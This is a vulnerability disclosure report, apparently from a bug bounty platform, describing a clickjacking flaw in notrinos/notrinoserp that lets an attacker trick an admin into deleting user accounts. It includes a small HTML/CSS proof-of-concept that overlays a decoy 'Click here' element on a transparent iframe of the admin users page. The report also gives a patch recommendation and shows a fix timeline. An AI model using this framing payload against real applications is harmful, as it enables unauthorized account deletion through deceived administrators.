Clickjacking Leads To User Deletion in notrinos/notrinoserp

Valid

Reported on

Aug 21st 2022


  1. Hello team, on notrinoserp there is no clickjacking protection implemented x-frame-options, so an attacker can perform clickjacking attack, and in this case im able to delete user account via this vulnerability from the admin account, here is the POC:

Exploit Script:

<style>
    iframe {
        position:relative;
        width:1200px;
        height: 650px;
        opacity: 0.4;
        z-index: 2;
    }
    div {
        position:absolute;
        top:183px;
        left:880px;
        z-index: 1;
    }
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>

Patch Recommendation:

  1. Add X-Frameheader to prevent clickjacking/UI Redressing attacks

# Impact

1. An attacker can delete users account via exploiting this vulnerability via misleading the admin
We are processing your report and will contact the notrinos/notrinoserp team within 24 hours. a month ago
We have contacted a member of the notrinos/notrinoserp team and are waiting to hear back a month ago
Phương gave praise a month ago
Thanks @akshayravic09yc47 for detecting this vulnerability, it will be fixed soon.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Phương assigned a CVE to this report a month ago
Phương validated this vulnerability a month ago
Akshay Ravi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Phương confirmed that a fix has been merged on c2ff3d a month ago
Phương has been awarded the fix bounty
to join this conversation